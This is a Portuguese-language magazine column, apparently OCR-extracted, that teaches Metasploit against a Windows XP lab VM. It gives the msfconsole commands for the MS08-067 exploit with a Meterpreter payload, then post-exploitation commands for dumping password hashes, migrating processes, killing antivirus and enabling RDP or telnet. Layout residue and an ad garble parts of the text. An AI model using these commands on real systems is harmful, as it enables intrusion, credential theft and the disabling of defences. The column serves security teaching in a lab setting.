Metasploit – parte 8
Transcrição
Metasploit – parte 8
Coluna do Alexandre Metasploit – parte 8 Comandos úteis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados. por Alexandre Borges O Metasploit disponibiliza um payload especial chamado de Meterpreter, que proporciona ampla interação com a máquina alvo após a invasão, assim como uma inteligente coleta de dados e possibilidade de execução de uma ampla variedade de scripts. Não são em todos os casos de invasão que existe a possibilidade de utilização o Meterpreter como payload de controle, no entanto, em grande parte das ocorrências isto é possível e, inclusive, recomendado. Nesta coluna, ao invés de mostrar a execução dos comandos, vamos aprender a trabalhar com alguns deles, suas opções e scripts, e, se necessário, visualizar a saída resultante. Isto é um convite para que o leitor possa fazer seus próprios experimentos e observar com detalhes o resultado de comandos ou scripts, os quais não seriam factíveis incluir nesta coluna devido ao seu espaço reduzido. O ambiente que foi utilizado têm máquinas virtuais WMware ou VirtualBox, sendo que uma delas possui o Kali Linux versão 1.6 – 64 bits e a outra executa o Windows XP SP2 – 32 bits. Ambas estão usando uma conexão com o mundo externo do tipo NAT onde o Kali tem endereço IP 192.168.81.128 e o Windows tem endereço IP 192.168.81.132. A primeira etapa, mais simples, é realizar a exploração em busca de uma falha do WinXP e para isso você já aprendeu nas colunas anteriores que pode fazer uso do OpenVAS ou do Nesssus para listar as vulnerabilidades. Deste ponto, podemos usar o Metasploit (figura 1). O comando show payloads listará os payloads que podem ser utilizados e enviados para a máquina explorada, entretanto somente alguns envolvem o Meterpreter. Por isto, vamos incluí-lo: root@kali:~# msfconsole msf > search ms08-067 msf > use exploit/windows/ smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.81.132 msf exploit(ms08_067_netapi) > show payloads Figura 1 Console do Metasploit. explorar a vulnerabilidade citada e isto é feito de acordo com a figura 2. Como o leitor pode notar, o sistema foi invadido com sucesso. Deste ponto, utilizando o meterpreter como payload, o mesmo criou uma sessão para a máquina alvo, nos proporcionando um enorme leque de alternativas onde uma lista com algumas opções possíveis seguem abaixo: ps » observa todos os processos sendo executados na máquina invadida; getid » evidencia com qual usuário estamos logados após a invasão; sysinfo » mostra informações do sistema invadido screenshot » tira uma foto do deskop da máquina invadia e a armazena no diretório /root; getpid » obtém o PID do processo que está sendo executado depois de ter invadido a máquina; migrate <pid> » migra a sessão usada pelo Meterpreter para outro processo que seja persistente (figura 3). O motivo disto é evitar que o usuário da máquina invadida termine o processo no qual estamos conectados e, com isto, seja perdido o acesso ao host por parte do hacker; hashdump » realiza um “dump” do SAM (Security Account Manager). Todavia, para que isto possa ser feito com sucesso, devemos nos conectar como SYSTEM. Caso este não seja o caso, tente elevar o msf exploit(ms08_067_netapi) > set payload windows/ meterpreter/bind_tcp Deste ponto em diante estamos prontos para 10 Figura 2 Exploração bem sucedida de vulnerabilidade. www.linuxmagazine.com.br Figura 3 Transferência da sessão ativa do Meterpreter. privilégio com o comando use priv antes do comando hashdump. Após obter os hashes, uma opção seria usar um cracker como “John the Ripper” ou “L0phtCrack” para descobrir as senhas. Escrevi um tutorial simples sobre o assunto que pode ser acessado em [1]; background » deixa a sessão do Meterpreter em segundo plano e volta para o prompt normal do msfconsole; sessions -l » lista as sessões ativas do Meterpreter; session -i » assume uma sessão do Meterpreter de forma interativa; run checkvm » verifca se a máquina explorada é executado em uma máquina virtual ou não; run getcountermeasure » realiza a verificação de quais medidas de segurança estão implementadas na máquina alvo; run killav » desabilita programas antivirus que estão em execução na máquina de destino; run scraper » coleta diversas informações sobre o sistema alvo, incluindo o registro no caso de máquinas Windows, e salva em um diretório local (como /root/.msf4/logs/scripts/scraper); D I T O R Figura 5 Abertura de shell na máquina hackaeada. run getgui -e » habilita o Remote Desktop Protocol (RDP) na máquina alvo caso ele esteja desabilitado (figura 4). run winenum » executa enumeração completa da máquina alvo; run gettelnet -e » habilita o serviço de telnet no destino. run shell » abre um shell para a máquina hackeada (figura 5). n Mais informações [1] Como descobrir senhas: http://alexandreborges. org/2013/08/05/introduction-to-password-cracking-part-1/ Distribuidora exclusiva da Série linux Pro ALTA BOOKS E Figura 4 RDP na máquina alvo. A os os livr m s o d o T co so site do nos desconto e 30% d código com o onal* Código: ci 14 promo ln x 2 0 Conheça também: /altabooks alta_books Linux Magazine #108 | Fevereiro de 2014 www.altabooks.com.br Rua Viúva Cláudio, 291 – Rio de Janeiro - RJ Tels: (21) 3278-8069 | (21) 3278-8159 11 * Promoção válida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br
Documentos relacionados
Tutoriais de Segurança de Redes
“win32_bind”, caso a vulnerabilidade seja explorada com sucesso, a execução do exploit resultará na
disponibilização de uma shell no sistema remoto. A seleção do payload específico é feita através ...